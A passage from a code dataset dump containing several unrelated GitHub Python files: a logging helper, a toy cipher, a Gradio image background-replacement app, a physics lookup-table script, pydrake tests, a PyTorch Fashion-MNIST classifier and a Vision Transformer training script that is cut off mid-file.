response\n","repo_name":"tizhproger/covid_map","sub_path":"apps/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32694083222","text":"# -*-coding:utf-8 -*-\n\"\"\"\n logging模块\n\"\"\"\nimport logging\nimport os\n\nroot_dir = os.path.dirname(os.path.dirname(__file__))\nlog_dir = '/'.join((root_dir, 'logs'))\n# logger_path = '/'.join((log_dir, 'logger.log'))\nlogger_path = r'E:\\Auto_Test\\Apex_One\\logs\\logger.log'\n\n\nclass Log(object):\n __flag = None\n\n def __new__(cls, *args, **kwargs):\n if not cls.__flag:\n cls.__flag = super().__new__(cls)\n # 新创建后__flag就不为None\n # a = \"Not None\" if cls.__flag != None else \"None\"\n # print(a)\n return cls.__flag\n\n def __init__(self):\n if 'logger' not in self.__dict__:\n logger = logging.getLogger()\n logger.setLevel(level=logging.DEBUG)\n filehandle = logging.FileHandler(logger_path, encoding='utf-8')\n streamhandle = logging.StreamHandler()\n logger.addHandler(filehandle)\n logger.addHandler(streamhandle)\n format = logging.Formatter('%(asctime)s:%(levelname)s:%(lineno)s %(message)s')\n filehandle.setFormatter(format)\n streamhandle.setFormatter(format)\n\n self.logger = logger\n\n def return_logger(self):\n return self.logger\n\n\ndef get_logger():\n return Log().return_logger()\n\n\n# 返回单例logger\nlogger = get_logger()\n\nif __name__ == '__main__':\n logger = get_logger()\n logger.error('Oh,My God,there is a problem!')\n","repo_name":"Onebigbera/ApexOne","sub_path":"common/logging_hander_single_instance.py","file_name":"logging_hander_single_instance.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"34530040324","text":"import random\r\nencription_key = [\"]\",\"a\",\"9\",\"b\",\"+\",\"c\",\".\",\"8\",\"d\",\"7\",\"e\",\"f\",\",\",\"g\",\"6\",\"-\",\"h\",\"i\",\"j\",\"[\",\":\",'\"',\"k\",\"l\",\"5\",\"@\",\"m\",\"4\",\"'\",\"n\",\"o\",\"p\",\"3\",\"q\",\" \",\"r\",\"2\",\"s\",\"{\",\"t\",\"u\",\"v\",\"1\",\"w\",\"/\",\"0\",\"x\",\"y\",\"}\",\"z\",\"=\"]\r\n\r\n\r\ndef loop_encription(number):\r\n while number > len(encription_key)-1:\r\n number = number - len(encription_key)\r\n while number <0:\r\n number = number + len(encription_key)\r\n return number\r\n\r\n\r\ndef encript(string):\r\n global encription_key\r\n alphabet = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\r\n random.shuffle(alphabet) \r\n number = [9,8,7,6,5,4,3,2,1,0]\r\n random.shuffle(number) \r\n specil = [\",\",\"'\",\"[\",\"]\",\"{\",\"}\",'\"',\":\",\"=\",\"+\",\"-\",\"@\",\".\",\"/\",\" \"]\r\n random.shuffle(specil) \r\n encription = \"\"\r\n for i in range(len(encription_key)):\r\n if encription_key[i].isdigit() == True:\r\n encription= encription +str(number[len(number)-1])\r\n number = number[:-1]\r\n elif encription_key[i].isalpha() == True:\r\n encription = encription + alphabet[len(alphabet)-1]\r\n alphabet = alphabet[:-1]\r\n else:\r\n encription = encription + specil[len(specil)-1]\r\n specil = specil[:-1]\r\n encrip_string = encription\r\n for i in range(len(string)):\r\n if string[i] not in encription:\r\n encrip_string = encrip_string + string[i]\r\n for x in range(len(encription)):\r\n if string[i] == encription_key[x]:\r\n encrip_string = encrip_string + encription[loop_encription(x+i)]\r\n return encrip_string\r\n\r\n\r\ndef unencript(encrip_string):\r\n global encription_key\r\n encription = encrip_string[0:len(encription_key)]\r\n string = encrip_string[len(encription_key):len(encrip_string)]\r\n unencrip_string = \"\"\r\n for i in range(len(string)):\r\n if string[i] not in encription:\r\n unencrip_string = unencrip_string + string[i]\r\n for x in range(len(encription_key)):\r\n if string[i] == encription[x]:\r\n unencrip_string = unencrip_string + encription_key[loop_encription(x-i)]\r\n return unencrip_string\r\n\r\nprint(encript(\"why\"))","repo_name":"Botany-Downs-Secondary-College/password_manager-ryan-l","sub_path":"secure.py","file_name":"secure.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3177544257","text":"def gcd(a, b):\n if (a == 0 or b == 0):\n return a+b\n if (a>b):\n return gcd(a%b, b)\n return gcd(b%a, a)\n\nN, M = map(int, input().split())\nif (N < 0):\n N *= -1\nif (M < 0):\n M *= -1\n\nif (N==0 and M==0):\n print(0)\nelif (gcd(M, N) > 1):\n print(2)\nelse:\n print(1)","repo_name":"BusanGukbap/hello-world","sub_path":"baekjoon/15979.py","file_name":"15979.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37179260014","text":"import numpy as np\nimport gradio as gr\nimport torch\nimport cv2\nimport torch\nimport numpy as np\nimport segmentation_models_pytorch as smp\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\nfrom torchvision.models.segmentation import deeplabv3_mobilenet_v3_large\nfrom torchvision.models.segmentation.deeplabv3 import DeepLabHead\nimport copy\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nmodel = deeplabv3_mobilenet_v3_large()\nmodel.classifier = DeepLabHead(960, 1)\n\ncheckpoint = torch.load('./best_deeplab.pth', map_location='cpu')\nmodel.load_state_dict(checkpoint['model_state_dict'])\n\n\ndef apply(image_input, image_background, select):\n img_transform = A.Compose([\n A.Resize(width=256, height=256),\n ToTensorV2()\n ])\n\n img = image_input.astype(np.float32)\n img = img_transform(image=img)['image'].unsqueeze(0)\n # print(img.shape)\n\n model.eval()\n with torch.no_grad():\n output = model(img)['out']\n output = torch.sigmoid(output)\n\n output = output.detach().numpy()\n output = output.squeeze()\n\n output = (output > 0.5).astype(np.uint8) * 255\n\n _, mask = cv2.threshold(output, 30, 255, cv2.THRESH_BINARY)\n # mask = cv2.bitwise_not(mask) # 반전\n\n ### 가장자리 부드럽게 ###\n\n kernel = np.ones((3, 3), np.uint8)\n # 오프닝\n mask = cv2.erode(mask, kernel, iterations=5)\n mask = cv2.dilate(mask, kernel, iterations=5)\n # 가우시안 블러\n mask = cv2.GaussianBlur(mask, (5, 5), 0)\n\n ### 필터링\n for i in select:\n if i == \"AdvancedBlur\":\n transform = A.Compose([\n A.AdvancedBlur(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"CLAHE\":\n transform = A.Compose([\n A.CLAHE(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"Defocus\":\n transform = A.Compose([\n A.Defocus(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"BrightnessContrast\":\n transform = A.Compose([\n A.Defocus(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"Fog\":\n transform = A.Compose([\n A.RandomFog(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"Gamma\":\n transform = A.Compose([\n A.RandomGamma(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"Gravel\":\n transform = A.Compose([\n A.RandomGravel(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"Rain\":\n transform = A.Compose([\n A.RandomRain(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"Shadow\":\n transform = A.Compose([\n A.RandomShadow(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"Snow\":\n transform = A.Compose([\n A.RandomSnow(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"SunFlare\":\n transform = A.Compose([\n A.RandomSunFlare(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"ToneCurve\":\n transform = A.Compose([\n A.RandomToneCurve(p=1),\n ])\n image_background = transform(image=image_background)['image']\n elif i == \"Gray\":\n transform = A.Compose([\n A.ToGray(p=1),\n ])\n image_background = transform(image=image_background)['image']\n\n #### background \n fg_h, fg_w, _ = image_input.shape\n\n bg_h, bg_w, _ = image_background.shape\n\n # fit to fg width\n image_background = cv2.resize(image_background, dsize=(fg_w, int(fg_w * bg_h / bg_w)))\n\n bg_h, bg_w, _ = image_background.shape\n\n margin = (bg_h - fg_h) // 2\n\n if margin > 0:\n image_background = image_background[margin:-margin, :, :]\n else:\n image_background = cv2.copyMakeBorder(image_background, top=abs(margin), bottom=abs(margin), left=0, right=0,\n borderType=cv2.BORDER_REPLICATE)\n\n # final resize\n image_background = cv2.resize(image_background, dsize=(fg_w, fg_h))\n\n mask = cv2.resize(mask, (fg_w, fg_h))\n cv2.copyTo(image_input, mask, image_background)\n\n return image_background\n\n\ndef stop(inp):\n return inp\n\n\n# 구체적 화면 코드 \n\nwith gr.Blocks() as demo:\n gr.Markdown(\"# 배경 변경 프로그램\")\n gr.Markdown(\"배경 이미지 변경\")\n gr.HTML(\"\"\"
Made By 5 Team : 이성규, 김민정, 이승현, 이주형, 민안세
\"\"\")\n\n # 1 번탭\n with gr.Tab(\"Image Upload\"):\n with gr.Row():\n image_input = gr.Image(label=\"Upload IMG\")\n image_background = gr.Image(label=\"Upload background Image\")\n select = gr.Dropdown(\n [\"AdvancedBlur\", \"CLAHE\", \"Defocus\", \"BrightnessContrast\", \"Fog\", \"Gamma\", \"Gravel\", \"Rain\", \"Shadow\",\n \"Snow\", \"SunFlare\", \"ToneCurve\", \"Gray\"], label=\"Background effect\", value=[\"Rain\", \"Gray\"],\n multiselect=True)\n image_button = gr.Button(\"TransForm Image\")\n image_output = gr.Image(label=\"Output IMG\")\n\n image_button.click(apply, inputs=[image_input, image_background, select], outputs=image_output)\n\n gr.Examples(\n label=\"Image\",\n examples=[\"./1803151818-00000003.jpg\", \"./1803151818-00000004.jpg\", \"./1803151818-00000006.jpg\"],\n inputs=image_input,\n )\n gr.Examples(\n label=\"background Image\",\n examples=[\"./background.jpg\"],\n inputs=image_background,\n )\n\n # 2번 탭\n with gr.Tab(\"Using WebCam\"):\n with gr.Row():\n image_web = gr.Image(source=\"webcam\", streaming=True, label=\"Web Cam\")\n image_input = gr.Image(label=\"IMG\")\n image_background = gr.Image(label=\"Upload background Image\")\n select = gr.Dropdown(\n [\"AdvancedBlur\", \"CLAHE\", \"Defocus\", \"BrightnessContrast\", \"Fog\", \"Gamma\", \"Gravel\", \"Rain\", \"Shadow\",\n \"Snow\", \"SunFlare\", \"ToneCurve\", \"Gray\"], label=\"Background effect\", value=[\"Rain\", \"Gray\"],\n multiselect=True)\n image_button = gr.Button(\"TransForm Image\")\n image_output = gr.Image(label=\"Output IMG\")\n\n image_button.click(stop, inputs=image_web, outputs=image_input)\n image_button.click(apply, inputs=[image_input, image_background, select], outputs=image_output)\n\n gr.Examples(\n label=\"background Image\",\n examples=[\"./background.jpg\"],\n inputs=image_background,\n )\n\ndemo.launch(share=True)\n","repo_name":"Salt-Holic/human_seg","sub_path":"web_gui.py","file_name":"web_gui.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12915901175","text":"from optparse import OptionParser\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom digicampipe.utils.fill_lookup import fill_lookup\nfrom digicampipe.utils.rswl_plot import energy_lookup2d\n\nfrom digicampipe.utils.shower_geometry import impact_parameter\n\n\ndef entry():\n parser = OptionParser()\n parser.add_option(\n \"-l\",\n \"--hillas\",\n dest=\"hillas\",\n help=\"path to a file with hillas parameters\",\n default='../../../sst-1m_simulace/data_test/ryzen_testprod/0.0deg/Data/hillas_gamma_ze00_az000_p13_b07.npz')\n parser.add_option(\n \"-m\",\n \"--mc\",\n dest=\"mc\",\n help=\"path to a file with shower MC parameters\",\n default='../../../sst-1m_simulace/data_test/ryzen_testprod/0.0deg/Data/shower_param_gamma_ze00_az000.txt')\n parser.add_option(\n '-o',\n '--output',\n dest='output',\n help='path to an output lookup table',\n default='../../../sst-1m_simulace/data_test/ryzen_testprod/0.0deg/Data/energy-lookup-ze00-az000-offset00')\n (options, args) = parser.parse_args()\n\n hillas = np.load(options.hillas)\n mc = np.loadtxt(options.mc)\n\n # Masking borderflagged data\n mask = [x == 0 for x in hillas['border']]\n\n size = hillas['size'][mask]\n mc = mc[mask, :]\n\n # True MC params\n core_distance = mc[:, 2]\n energy = mc[:, 3]\n x_core = mc[:, 9]\n y_core = mc[:, 10]\n theta = mc[:, 4]\n phi = mc[:, 5]\n\n # Impact parameter\n # not optimal, tel. coordinates should be loaded from somewhere..\n telpos = np.array([0., 0., 4.])\n impact_parameter = impact_parameter(x_core, y_core, telpos, theta, phi)\n\n # Binning in log10 size\n size_bins_edges = np.linspace(0.5, 5, 100)\n\n # Binning in core distance\n impact_bins_edges = np.linspace(0, 500, 100)\n\n # Filling lookup tables\n binned_energy = fill_lookup(size_bins_edges,\n impact_bins_edges,\n impact_parameter,\n np.log10(size),\n energy)\n\n # Save the lookup table\n np.savez(options.output,\n impact=binned_energy['impact'],\n size=binned_energy['size'],\n mean=binned_energy['mean'],\n std=binned_energy['std'],\n n_data=binned_energy['n_data'])\n\n print('Lookup table generated and saved..')\n\n # Plotting lookup tables\n energy_lookup2d(binned_energy)\n plt.show()\n\n\nif __name__ == '__main__':\n entry()\n","repo_name":"cta-sst-1m/digicampipe","sub_path":"digicampipe/scripts/energy_generate_lookup.py","file_name":"energy_generate_lookup.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"5500714511","text":"from __future__ import absolute_import, division, print_function\n\nimport unittest\nimport os.path\n\nfrom pydrake import getDrakePath\nfrom pydrake.multibody.parsers import PackageMap\nfrom pydrake.multibody.rigid_body_tree import (\n AddModelInstanceFromUrdfStringSearchingInRosPackages,\n AddModelInstancesFromSdfString,\n AddModelInstancesFromSdfStringSearchingInRosPackages,\n FloatingBaseType,\n RigidBodyTree,\n)\n\n\nclass TestParsers(unittest.TestCase):\n def test_urdf(self):\n \"\"\"Test that an instance of a URDF model can be loaded into a\n RigidBodyTree by passing a complete set of arguments to Drake's URDF\n parser.\n \"\"\"\n urdf_file = os.path.join(\n getDrakePath(),\n \"examples/pr2/models/pr2_description/urdf/pr2_simplified.urdf\")\n with open(urdf_file) as f:\n urdf_string = f.read()\n base_dir = os.path.dirname(urdf_file)\n package_map = PackageMap()\n weld_frame = None\n floating_base_type = FloatingBaseType.kRollPitchYaw\n\n robot = RigidBodyTree()\n AddModelInstanceFromUrdfStringSearchingInRosPackages(\n urdf_string,\n package_map,\n base_dir,\n floating_base_type,\n weld_frame,\n robot)\n\n expected_num_bodies = 86\n self.assertEqual(robot.get_num_bodies(), expected_num_bodies,\n msg='Incorrect number of bodies: {0} vs. {1}'.format(\n robot.get_num_bodies(), expected_num_bodies))\n\n def test_sdf(self):\n sdf_file = os.path.join(\n getDrakePath(), \"examples/acrobot/Acrobot.sdf\")\n with open(sdf_file) as f:\n sdf_string = f.read()\n package_map = PackageMap()\n weld_frame = None\n floating_base_type = FloatingBaseType.kRollPitchYaw\n\n robot_1 = RigidBodyTree()\n AddModelInstancesFromSdfStringSearchingInRosPackages(\n sdf_string,\n package_map,\n floating_base_type,\n weld_frame,\n robot_1)\n robot_2 = RigidBodyTree()\n AddModelInstancesFromSdfString(\n sdf_string,\n floating_base_type,\n weld_frame,\n robot_2)\n\n for robot in robot_1, robot_2:\n expected_num_bodies = 4\n self.assertEqual(robot.get_num_bodies(), expected_num_bodies)\n\n def test_package_map(self):\n pm = PackageMap()\n self.assertFalse(pm.Contains(\"foo\"))\n self.assertEqual(pm.size(), 0)\n pm.Add(\"foo\", os.path.abspath(os.curdir))\n self.assertEqual(pm.size(), 1)\n self.assertTrue(pm.Contains(\"foo\"))\n self.assertEqual(pm.GetPath(\"foo\"), os.path.abspath(os.curdir))\n\n # Populate from folder.\n # TODO(eric.cousineau): This mismatch between casing is confusing, with\n # `Atlas` being the package name, but `atlas` being the dirctory name.\n pm = PackageMap()\n self.assertEqual(pm.size(), 0)\n pm.PopulateFromFolder(\n os.path.join(getDrakePath(), \"examples\", \"atlas\"))\n self.assertTrue(pm.Contains(\"Atlas\"))\n self.assertEqual(pm.GetPath(\"Atlas\"), os.path.join(\n getDrakePath(), \"examples\", \"atlas\", \"\"))\n\n # Populate from environment.\n pm = PackageMap()\n os.environ[\"PYDRAKE_TEST_ROS_PACKAGE_PATH\"] = os.path.join(\n getDrakePath(), \"examples\")\n pm.PopulateFromEnvironment(\"PYDRAKE_TEST_ROS_PACKAGE_PATH\")\n self.assertTrue(pm.Contains(\"Atlas\"))\n self.assertEqual(pm.GetPath(\"Atlas\"), os.path.join(\n getDrakePath(), \"examples\", \"atlas\", \"\"))\n del os.environ[\"PYDRAKE_TEST_ROS_PACKAGE_PATH\"]\n\n # Populate upstream.\n pm = PackageMap()\n pm.PopulateUpstreamToDrake(\n os.path.join(getDrakePath(), \"examples\", \"atlas\", \"urdf\",\n \"atlas_minimal_contact.urdf\"))\n self.assertTrue(pm.Contains(\"Atlas\"))\n self.assertEqual(pm.GetPath(\"Atlas\"), os.path.join(\n getDrakePath(), \"examples\", \"atlas\"))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"BachiLi/drake-distro","sub_path":"bindings/pydrake/multibody/test/parsers_test.py","file_name":"parsers_test.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"1552652452","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 12 00:29:22 2018\n\n@author: myidispg\n\"\"\"\n\nimport torch\nfrom torchvision import datasets, transforms\nimport helper\n\n# Define a transform to normalize the data\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n# Download and load the training data\ntrainset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download=True, train=True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=64, shuffle=True)\n\n# Download and load the test data\ntestset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download=True, train=False, transform=transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=64, shuffle=True)\n\n# See one image\nimage, label = next(iter(trainloader))\nhelper.imshow(image[0,:]);\n\n# Build the network\n\nfrom torch import nn, optim\nimport torch.nn.functional as F\n\n\nclass Classifier(nn.Module):\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(784, 128)\n self.fc2 = nn.Linear(128, 64)\n self.fc3 = nn.Linear(64, 32)\n self.fc4 = nn.Linear(32, 10)\n \n def forward(self, x):\n x = x.view(x.shape[0], -1)\n \n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc3(x))\n x = F.log_softmax(self.fc4(x), dim=1)\n \n return x\n \n# Create the network, define the criterion and optimizer\nmodel = Classifier()\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr = 0.001)\n\n# Train the network here\nepochs = 10\n\nfor e in range(epochs):\n running_loss = 0\n for images, labels in trainloader:\n logits = model.forward(images)\n loss = criterion(logits, labels)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n running_loss += loss.item()\n else:\n print(f\"Training loss: {running_loss/len(trainloader)}\")\n \n#---------With Dropout and croo-validation----------------------------------\nfrom torch import nn, optim\nimport torch.nn.functional as F\n\nclass Model(nn.Module):\n \n def __init__(self):\n super().__init__()\n \n self.fc1 = nn.Linear(784, 128)\n self.fc2 = nn.Linear(128, 64)\n self.fc2 = nn.Linear(64, 10)\n \n def forward(self, x):\n # make sure input tensor is flattened\n x = x.view(x.shape[0], -1)\n\n # Now with dropout\n x = self.dropout(F.relu(self.fc1(x)))\n x = self.dropout(F.relu(self.fc2(x)))\n x = self.dropout(F.relu(self.fc3(x)))\n\n # output so no dropout here\n x = F.log_softmax(self.fc4(x), dim=1)\n\n return x\n \nmodel = Classifier()\ncriterion = nn.NLLLoss()\noptimizer = optim.Adam(model.parameters(), lr=0.003)\n\nepochs = 30\nsteps = 0\n\ntrain_losses, test_losses = [], []\nfor e in range(epochs):\n running_loss = 0\n for images, labels in trainloader:\n \n optimizer.zero_grad()\n \n log_ps = model(images)\n loss = criterion(log_ps, labels)\n loss.backward()\n optimizer.step()\n \n running_loss += loss.item()\n \n else:\n test_loss = 0\n accuracy = 0\n \n # Turn off gradients for validation, saves memory and computations\n with torch.no_grad():\n model.eval() # Set the model to evaluation mode. No training can occur. Dropouts are off.\n for images, labels in testloader:\n log_ps = model(images)\n test_loss += criterion(log_ps, labels)\n \n ps = torch.exp(log_ps)\n top_p, top_class = ps.topk(1, dim=1)\n equals = top_class == labels.view(*top_class.shape)\n accuracy += torch.mean(equals.type(torch.FloatTensor))\n \n model.train() # Set the model back to training mode\n \n train_losses.append(running_loss/len(trainloader))\n test_losses.append(test_loss/len(testloader))\n\n print(\"Epoch: {}/{}.. \".format(e+1, epochs),\n \"Training Loss: {:.3f}.. \".format(running_loss/len(trainloader)),\n \"Test Loss: {:.3f}.. \".format(test_loss/len(testloader)),\n \"Test Accuracy: {:.3f}\".format(accuracy/len(testloader)))","repo_name":"myidispg/PytorchProjects","sub_path":"Part 1 - Neural Networks/pytorch-fashion-mnist.py","file_name":"pytorch-fashion-mnist.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26106942855","text":"import tempfile\n\nimport tensorflow as tf\nfrom tensorflow.keras import layers\n\nimport fastestimator as fe\nfrom fastestimator.dataset.data import cifair10, cifair100\nfrom fastestimator.op.numpyop.meta import Sometimes\nfrom fastestimator.op.numpyop.multivariate import HorizontalFlip, PadIfNeeded, RandomCrop\nfrom fastestimator.op.numpyop.univariate import CoarseDropout, Normalize\nfrom fastestimator.op.tensorop.loss import CrossEntropy\nfrom fastestimator.op.tensorop.model import ModelOp, UpdateOp\nfrom fastestimator.trace.io import BestModelSaver\nfrom fastestimator.trace.metric import Accuracy\n\n\ndef scaled_dot_product_attention(q, k, v):\n matmul_qk = tf.matmul(q, k, transpose_b=True)\n dk = tf.cast(tf.shape(k)[-1], tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)\n output = tf.matmul(attention_weights, v)\n return output\n\n\ndef point_wise_feed_forward_network(em_dim, dff):\n return tf.keras.Sequential([\n tf.keras.layers.Dense(dff, activation='relu'), # (batch_size, seq_len, dff)\n tf.keras.layers.Dense(em_dim) # (batch_size, seq_len, em_dim)\n ])\n\n\nclass MultiHeadAttention(layers.Layer):\n def __init__(self, em_dim, num_heads):\n super().__init__()\n assert em_dim % num_heads == 0, \"model dimension must be multiple of number of heads\"\n self.num_heads = num_heads\n self.em_dim = em_dim\n self.depth = em_dim // self.num_heads\n self.wq = layers.Dense(em_dim)\n self.wk = layers.Dense(em_dim)\n self.wv = layers.Dense(em_dim)\n self.dense = layers.Dense(em_dim)\n\n def split_heads(self, x, batch_size):\n x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))\n return tf.transpose(x, perm=[0, 2, 1, 3]) # B, num_heads, seq_len, depth\n\n def call(self, v, k, q):\n batch_size = tf.shape(q)[0]\n q = self.wq(q) # B, seq_len, em_dim\n k = self.wk(k) # B, seq_len, em_dim\n v = self.wv(v) # B, seq_len, em_dim\n q = self.split_heads(q, batch_size)\n k = self.split_heads(k, batch_size)\n v = self.split_heads(v, batch_size)\n scaled_attention = scaled_dot_product_attention(q, k, v)\n scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) #B, seq_len, num_heads, depth\n concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.em_dim)) # B, seq_len, em_dim\n output = self.dense(concat_attention)\n return output\n\n\nclass EncoderLayer(layers.Layer):\n def __init__(self, em_dim, num_heads, dff, rate=0.1):\n super().__init__()\n self.mha = MultiHeadAttention(em_dim, num_heads)\n self.ffn = point_wise_feed_forward_network(em_dim, dff)\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\n self.dropout1 = layers.Dropout(rate)\n self.dropout2 = layers.Dropout(rate)\n\n def call(self, x, training):\n attn_output = self.mha(x, x, x)\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(x + attn_output)\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output, training=training)\n out2 = self.layernorm2(out1 + ffn_output)\n return out2\n\n\nclass Encoder(layers.Layer):\n def __init__(self, num_layers, em_dim, num_heads, dff, rate=0.1):\n super().__init__()\n self.num_layers = num_layers\n self.enc_layers = [EncoderLayer(em_dim, num_heads, dff, rate) for _ in range(num_layers)]\n self.dropout = layers.Dropout(rate)\n\n def call(self, x, training=None):\n x = self.dropout(x, training=training)\n for i in range(self.num_layers):\n x = self.enc_layers[i](x, training)\n return x\n\n\nclass PositionEmbedding(layers.Layer):\n def __init__(self, image_size, patch_size, em_dim):\n super().__init__()\n h, w, _ = image_size\n assert h % patch_size == 0 and w % patch_size == 0, \"image size must be an integer multiple of patch size\"\n self.position_embedding = tf.Variable(tf.zeros(shape=(1, h * w // patch_size**2 + 1, em_dim)),\n trainable=True,\n name=\"position_embedding\")\n\n def call(self, x):\n return x + self.position_embedding\n\n\nclass ClsToken(layers.Layer):\n def __init__(self, em_dim):\n super().__init__()\n self.cls_token = tf.Variable(tf.zeros(shape=(1, 1, em_dim)), trainable=True, name=\"cls_token\")\n self.em_dim = em_dim\n\n def call(self, x):\n batch_size = tf.shape(x)[0]\n return tf.concat([tf.broadcast_to(self.cls_token, (batch_size, 1, self.em_dim)), x], axis=1)\n\n\ndef transformer_encoder(image_size, patch_size=16, num_layers=12, em_dim=768, num_heads=12, dff=3072, rate=0.1):\n inputs = layers.Input(shape=image_size)\n # Patch Embedding\n x = layers.Conv2D(em_dim, kernel_size=patch_size, strides=patch_size, use_bias=False)(inputs) #[B, H, W, em_dim]\n x = layers.Reshape((-1, em_dim))(x) # [B, num_patches, em_dim]\n x = ClsToken(em_dim)(x) # [B, num_patches + 1, em_dim]\n x = PositionEmbedding(image_size, patch_size, em_dim)(x)\n x = Encoder(num_layers=num_layers, em_dim=em_dim, num_heads=num_heads, dff=dff, rate=rate)(x)\n x = layers.LayerNormalization(epsilon=1e-6)(x[:, 0, :]) # only need the embedding w.r.t [cls] token\n return tf.keras.Model(inputs=inputs, outputs=x)\n\n\ndef vision_transformer(num_class,\n image_size,\n weights_path=None,\n patch_size=16,\n num_layers=12,\n em_dim=768,\n num_heads=12,\n dff=3072,\n rate=0.1):\n inputs = layers.Input(shape=image_size)\n backbone = transformer_encoder(image_size, patch_size, num_layers, em_dim, num_heads, dff, rate)\n if weights_path:\n backbone.load_weights(weights_path)\n x = backbone(inputs)\n x = layers.Dense(num_class)(x)\n return backbone, tf.keras.Model(inputs=inputs, outputs=x)\n\n\ndef pretrain(batch_size, epochs, model_dir=tempfile.mkdtemp(), train_steps_per_epoch=None, eval_steps_per_epoch=None):\n train_data, eval_data = cifair100.load_data()\n pipeline = fe.Pipeline(\n train_data=train_data,\n eval_data=eval_data,\n batch_size=batch_size,\n ops=[\n Normalize(inputs=\"x\", outputs=\"x\", mean=(0.4914, 0.4822, 0.4465), std=(0.2471, 0.2435, 0.2616)),\n PadIfNeeded(min_height=40, min_width=40, image_in=\"x\", image_out=\"x\", mode=\"train\"),\n RandomCrop(32, 32, image_in=\"x\", image_out=\"x\", mode=\"train\"),\n Sometimes(HorizontalFlip(image_in=\"x\", image_out=\"x\", mode=\"train\")),\n CoarseDropout(inputs=\"x\", outputs=\"x\", mode=\"train\", max_holes=1)\n ])\n backbone, vit = fe.build(\n model_fn=lambda: vision_transformer(\n num_class=100, image_size=(32, 32, 3), patch_size=4, num_layers=6, em_dim=256, num_heads=8, dff=512),\n optimizer_fn=[None, lambda: tf.optimizers.SGD(0.01, momentum=0.9)])\n network = fe.Network(ops=[\n ModelOp(model=vit, inputs=\"x\", outputs=\"y_pred\"),\n CrossEntropy(inputs=(\"y_pred\", \"y\"), outputs=\"ce\", from_logits=True),\n UpdateOp(model=vit, loss_name=\"ce\")\n ])\n traces = [\n Accuracy(true_key=\"y\", pred_key=\"y_pred\"),\n BestModelSaver(model=backbone, save_dir=model_dir, metric=\"accuracy\", save_best_mode=\"max\")\n ]\n estimator = fe.Estimator(pipeline=pipeline,\n network=network,\n epochs=epochs,\n traces=traces,\n train_steps_per_epoch=train_steps_per_epoch,\n eval_steps_per_epoch=eval_steps_per_epoch)\n estimator.fit(warmup=False)\n return traces[1].model_path # return the weights path\n\n\ndef finetune(weights_path,\n batch_size,\n epochs,\n model_dir=tempfile.mkdtemp(),\n train_steps_per_epoch=None,\n eval_steps_per_epoch=None):\n train_data, eval_data = cifair10.load_data()\n pipeline = fe.Pipeline(\n train_data=train_data,\n eval_data=eval_data,\n batch_size=batch_size,\n ops=[\n Normalize(inputs=\"x\", outputs=\"x\", mean=(0.4914, 0.4822, 0.4465), std=(0.2471, 0.2435, 0.2616)),\n PadIfNeeded(min_height=40, min_width=40, image_in=\"x\", image_out=\"x\", mode=\"train\"),\n RandomCrop(32, 32, image_in=\"x\", image_out=\"x\", mode=\"train\"),\n 